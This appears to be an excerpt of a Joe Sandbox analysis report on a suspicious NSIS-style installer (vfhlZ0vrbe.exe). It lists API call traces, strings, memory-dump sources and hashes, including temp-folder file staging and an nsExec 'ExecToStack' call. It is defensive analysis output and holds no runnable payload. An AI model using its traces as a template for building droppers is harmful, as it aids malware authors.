                          Similarity
                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                          • String ID:
                          • API String ID: 590372296-0
                          • Opcode ID: 64c451d9d50d9bfa689017f85777d3b3ea4ec6884c029f4fd59a0d01b7806755
                          • Instruction ID: 4cf6c47baa67300a2587cb91bb909ead9d18e5d8973f7e879562a42f7fe873d6
                          • Opcode Fuzzy Hash: 64c451d9d50d9bfa689017f85777d3b3ea4ec6884c029f4fd59a0d01b7806755
                          • Instruction Fuzzy Hash: 58A16A71A00609FFDB11AFA0DE89EAE7BB9EB44354F40403AFA44B61A0C7754D51DF68

                          Control-flow Graph
                          (Rendered graph for the function starting at 405a4f, with executed and not-executed nodes; edge list omitted, API calls are listed below)
                          APIs
                          • DeleteFileA.KERNELBASE(?,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe"), ref: 00405A78
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\*.*,?,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe"), ref: 00405AC0
                          • lstrcatA.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\*.*,?,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe"), ref: 00405AE1
                          • lstrlenA.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\*.*,?,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe"), ref: 00405AE7
                          • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\*.*,?,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe"), ref: 00405AF8
                          • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405BA5
                          • FindClose.KERNEL32(00000000), ref: 00405BB6
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                          • String ID: "C:\Users\user\Desktop\vfhlZ0vrbe.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\*.*$\*.*
                          • API String ID: 2035342205-3221713239
                          • Opcode ID: 78f2e0e18cb785759574f080630192df6ebe3391163db671d7f5c390f5c48f83
                          • Instruction ID: da8d20c05f1c1589987c6f576fa29bd8846dab181693994c0c241c39a5f8a394
                          • Opcode Fuzzy Hash: 78f2e0e18cb785759574f080630192df6ebe3391163db671d7f5c390f5c48f83
                          • Instruction Fuzzy Hash: 3051C030904A04BADB21AB618C85FAF7AB8EF42754F14417FF445B11D2C77C6982DEAE
                          APIs
                          • FindFirstFileA.KERNELBASE(77193410,0042BCD8,C:\,00405D50,C:\,C:\,00000000,C:\,C:\,77193410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,77193410,C:\Users\user\AppData\Local\Temp\), ref: 0040662B
                          • FindClose.KERNEL32(00000000), ref: 00406637
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID: C:\
                          • API String ID: 2295610775-3404278061
                          • Opcode ID: 5cd1aebe143dc129e49842c5f71a26c727f8c2dbc53d2570feaf901eef8a8c0e
                          • Instruction ID: 21071efbed15a2f64541de492f8ee2fd881da0b051754d52d90be6cd238fbd17
                          • Opcode Fuzzy Hash: 5cd1aebe143dc129e49842c5f71a26c727f8c2dbc53d2570feaf901eef8a8c0e
                          • Instruction Fuzzy Hash: 08D012355490205BC64017396F0C85BBA599F163717118E37F8A6F12E0CB758C7296DC

                          Control-flow Graph
                          (Rendered graph for the function starting at 403e33, with executed and not-executed nodes; edge list omitted, API calls are listed below)
                          APIs
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E6F
                          • ShowWindow.USER32(?), ref: 00403E8F
                          • GetWindowLongA.USER32(?,000000F0), ref: 00403EA1
                          • ShowWindow.USER32(?,00000004), ref: 00403EBA
                          • DestroyWindow.USER32 ref: 00403ECE
                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403EE7
                          • GetDlgItem.USER32(?,?), ref: 00403F06
                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403F1A
                          • IsWindowEnabled.USER32(00000000), ref: 00403F21
                          • GetDlgItem.USER32(?,00000001), ref: 00403FCC
                          • GetDlgItem.USER32(?,00000002), ref: 00403FD6
                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403FF0
                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00404041
                          • GetDlgItem.USER32(?,00000003), ref: 004040E7
                          • ShowWindow.USER32(00000000,?), ref: 00404108
                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040411A
                          • EnableWindow.USER32(?,?), ref: 00404135
                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040414B
                          • EnableMenuItem.USER32(00000000), ref: 00404152
                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040416A
                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 0040417D
                          • lstrlenA.KERNEL32(0042A488,?,0042A488,00000000), ref: 004041A7
                          • SetWindowTextA.USER32(?,0042A488), ref: 004041B6
                          • ShowWindow.USER32(?,0000000A), ref: 004042EA
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                          • String ID:
                          • API String ID: 121052019-0
                          • Opcode ID: 839e81d427f6c58c85d128010f5d9028c8a9196b72fb1deba7765417e8979c48
                          • Instruction ID: 7c61018aff81ba8050a36ffdf8d01ac8e149416bf37329b2a87c27abd1a4edd3
                          • Opcode Fuzzy Hash: 839e81d427f6c58c85d128010f5d9028c8a9196b72fb1deba7765417e8979c48
                          • Instruction Fuzzy Hash: 60C1F4B1600205ABD7206F61EE49E2B3BBCEB85749F51053EF681B11F1CB799842DB2D

                          Control-flow Graph

                          APIs
                            • Part of subcall function 004066B5: GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                            • Part of subcall function 004066B5: GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                          • lstrcatA.KERNEL32(1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,77193410,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\vfhlZ0vrbe.exe",0000000A,0000000C), ref: 00403B11
                          • lstrlenA.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth,1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,77193410), ref: 00403B86
                          • lstrcmpiA.KERNEL32(?,.exe), ref: 00403B99
                          • GetFileAttributesA.KERNEL32(Remove folder: ,?,"C:\Users\user\Desktop\vfhlZ0vrbe.exe",0000000A,0000000C), ref: 00403BA4
                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth), ref: 00403BED
                            • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                          • RegisterClassA.USER32(0042E7C0), ref: 00403C2A
                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C42
                          • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C77
                          • ShowWindow.USER32(00000005,00000000,?,"C:\Users\user\Desktop\vfhlZ0vrbe.exe",0000000A,0000000C), ref: 00403CAD
                          • GetClassInfoA.USER32(00000000,RichEdit20A,0042E7C0), ref: 00403CD9
                          • GetClassInfoA.USER32(00000000,RichEdit,0042E7C0), ref: 00403CE6
                          • RegisterClassA.USER32(0042E7C0), ref: 00403CEF
                          • DialogBoxParamA.USER32(?,00000000,00403E33,00000000), ref: 00403D0E
                          Strings
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                          • String ID: "C:\Users\user\Desktop\vfhlZ0vrbe.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth$Control Panel\Desktop\ResourceLocale$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                          • API String ID: 1975747703-3813020735
                          • Opcode ID: 79260377285cc82dbbfc7a510320d5572e35410a0c0bc4c8fa40152996274480
                          • Instruction ID: 062707365540321fd28ddc31094d52b8ee002564e62880c3064c6a51a35bf8f0
                          • Opcode Fuzzy Hash: 79260377285cc82dbbfc7a510320d5572e35410a0c0bc4c8fa40152996274480
                          • Instruction Fuzzy Hash: 1A61B4706442006EE620BF629D46F273ABCEB44B49F44443FF945B62E2DB7D99068A3D

                          Control-flow Graph

                          APIs
                          • GetTickCount.KERNEL32 ref: 00402F42
                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\vfhlZ0vrbe.exe,00000400,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F5E
                            • Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\vfhlZ0vrbe.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                            • Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                          • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\vfhlZ0vrbe.exe,C:\Users\user\Desktop\vfhlZ0vrbe.exe,80000000,00000003,?,?,00403722,?,?,00000008), ref: 00402FAA
                          • GlobalAlloc.KERNELBASE(00000040,00000008,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 004030E0
                          Strings
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                          • String ID: "C:\Users\user\Desktop\vfhlZ0vrbe.exe"$8TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\vfhlZ0vrbe.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                          • API String ID: 2803837635-1351363330
                          • Opcode ID: f49f85fbe7888e3b10c39431673b010741fca75b5d582ad2466d93653721041e
                          • Instruction ID: 36ae42bb95036f4d014ef15fc9cddc9856debb4c315f30e11e88dada5eb0dcac
                          • Opcode Fuzzy Hash: f49f85fbe7888e3b10c39431673b010741fca75b5d582ad2466d93653721041e
                          • Instruction Fuzzy Hash: 6C510531A01214ABDB209F64DE85B9E7EBCEB0435AF60403BF504B62D2C77C9E418B6D

                          Control-flow Graph

                          APIs
                          • GetSystemDirectoryA.KERNEL32(Remove folder: ,00000400), ref: 00406452
                          • GetWindowsDirectoryA.KERNEL32(Remove folder: ,00000400,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00405409,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00000000), ref: 00406468
                          • SHGetPathFromIDListA.SHELL32(00000000,Remove folder: ,?,T@,00000007,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00405409,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000), ref: 004064C7
                          • CoTaskMemFree.OLE32(00000000,?,T@,00000007,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00405409,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000), ref: 004064D0
                          • lstrcatA.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00405409,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000), ref: 004064F4
                          • lstrlenA.KERNEL32(Remove folder: ,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00405409,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00000000,00422E40,771923A0), ref: 00406546
                          Strings
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                          • String ID: T@$Bry gek$$Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                          • API String ID: 4024019347-2750152971
                          • Opcode ID: 528d0d34f11662d8c7703c4154d98a0add83743daff245b27c466bc1c92f2fac
                          • Instruction ID: dd0baf6a3bef4ec2da884e75bd50347be15db8678cbe9dcd308fcfbafd937b9a
                          • Opcode Fuzzy Hash: 528d0d34f11662d8c7703c4154d98a0add83743daff245b27c466bc1c92f2fac
                          • Instruction Fuzzy Hash: 1361F371900210AADB219F24DD85B7E7BA4AB05714F12813FF807B62C1C67D8966DB9D

                          Control-flow Graph

                          APIs
                          • lstrcatA.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Reunified\Betrkkene,00000000,00000000,00000031), ref: 004017BD
                          • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Reunified\Betrkkene,00000000,00000000,00000031), ref: 004017E7
                            • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,Swindlery Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                            • Part of subcall function 004053D1: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                            • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                            • Part of subcall function 004053D1: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,004032C3,004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0), ref: 0040542D
                            • Part of subcall function 004053D1: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\), ref: 0040543F
                            • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                            • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                            • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                          Strings
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                          • String ID: Bry gek$$C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Reunified\Betrkkene$C:\Users\user\AppData\Local\Temp\nsw42F9.tmp$C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\nsExec.dll$ExecToStack
                          • API String ID: 1941528284-2530868756
                          • Opcode ID: 908cdde23a37c59eed602190bf861c7c438ddb75d702381ffc149047ffda4333
                          • Instruction ID: a1f186b67c4edeb34fad59b9cedf70daa635d1c2101920768012b0df21243cfe
                          • Opcode Fuzzy Hash: 908cdde23a37c59eed602190bf861c7c438ddb75d702381ffc149047ffda4333
                          • Instruction Fuzzy Hash: 6041C331900515BBCB107BA5CD46EAF3A78DF05328F20823FF526F11E2D67C8A519AAD

                          Control-flow Graph

                          APIs
                          • lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                          • lstrlenA.KERNEL32(004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                          • lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,004032C3,004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0), ref: 0040542D
                          • SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\), ref: 0040543F
                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                          Strings
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                          • String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\
                          • API String ID: 2531174081-3568339937
                          • Opcode ID: ebdbd1b6f4dce09f55bb89e7b78eef38760fa4045934dab0d298cb41f38885f9
                          • Instruction ID: 7fccb86dafa480228006d80d04b82b7e1b017f67e9930a1aa42837d262fd4390
                          • Opcode Fuzzy Hash: ebdbd1b6f4dce09f55bb89e7b78eef38760fa4045934dab0d298cb41f38885f9
                          • Instruction Fuzzy Hash: 81218971900118BBDF11AFA5CD85ADEBFA9EB05354F14807AF944B6291C6788E81CFA8

                          Control-flow Graph: rendered graph image not captured (function at 403168; calls 40337a, 403390, GetTickCount, 4067da, MulDiv, wsprintfA, 4053d1, 405ec7)
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CountTick$wsprintf
                          • String ID: %A$... %d%%$@.B
                          • API String ID: 551687249-2309215229
                          • Opcode ID: bbbdf68c611b1039cd3d8d859c56e524a634e556e3416af6923e642436e137c0
                          • Instruction ID: 381bea1cd078569db79acba847b1f3aad866332683383cfda6df38e9538e1e3d
                          • Opcode Fuzzy Hash: bbbdf68c611b1039cd3d8d859c56e524a634e556e3416af6923e642436e137c0
                          • Instruction Fuzzy Hash: 91513D71800219EBDB10DF65DA84B9E7BB8EB5535AF14417BEC00B72D0CB789A50CBA9

                          Control-flow Graph: rendered graph image not captured (function at 406647; calls GetSystemDirectoryA, wsprintfA, LoadLibraryExA)
                          APIs
                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                          • wsprintfA.USER32 ref: 00406697
                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004066AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: DirectoryLibraryLoadSystemwsprintf
                          • String ID: %s%s.dll$UXTHEME$\
                          • API String ID: 2200240437-4240819195
                          • Opcode ID: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                          • Instruction ID: e759eb08ac56218b9122c2e4f19d02add1096545fd4a6e696b7e3c492baae584
                          • Opcode Fuzzy Hash: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                          • Instruction Fuzzy Hash: 74F0FC305002096BDF149B74DD0DFEB365CAF08704F14097AA586E10D1E9B9D4758B69

                          Control-flow Graph: rendered graph image not captured (function at 4020ca; calls 402c5e, 401423, GetModuleHandleA, LoadLibraryExA, GetProcAddress, 4053d1, 403a36, FreeLibrary)
                          APIs
                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020F5
                            • Part of subcall function 004053D1: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                            • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                            • Part of subcall function 004053D1: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,004032C3,004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0), ref: 0040542D
                            • Part of subcall function 004053D1: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\), ref: 0040543F
                            • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                            • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                            • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402105
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00402115
                          • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040217F
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                          • String ID: Bry gek$
                          • API String ID: 2987980305-3395696698
                          • Opcode ID: 056f6e09274932c5806e516a526782628814fdef0fe3ef9b51a109e535a48abd
                          • Instruction ID: 18bbb9f6491bb16bc869df63e9f5beea4603ad23440c914569cabcc4b16c920a
                          • Opcode Fuzzy Hash: 056f6e09274932c5806e516a526782628814fdef0fe3ef9b51a109e535a48abd
                          • Instruction Fuzzy Hash: ED21C931A00115BBCF20BF659F89B6F7570AB40358F20413BF611B61D1CABD49839A5E

                          Control-flow Graph: rendered graph image not captured (function at 401c53; calls 402c3c, 402c5e, FindWindowExA, SendMessageTimeoutA, SendMessageA)
                          APIs
                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CC3
                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CDB
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
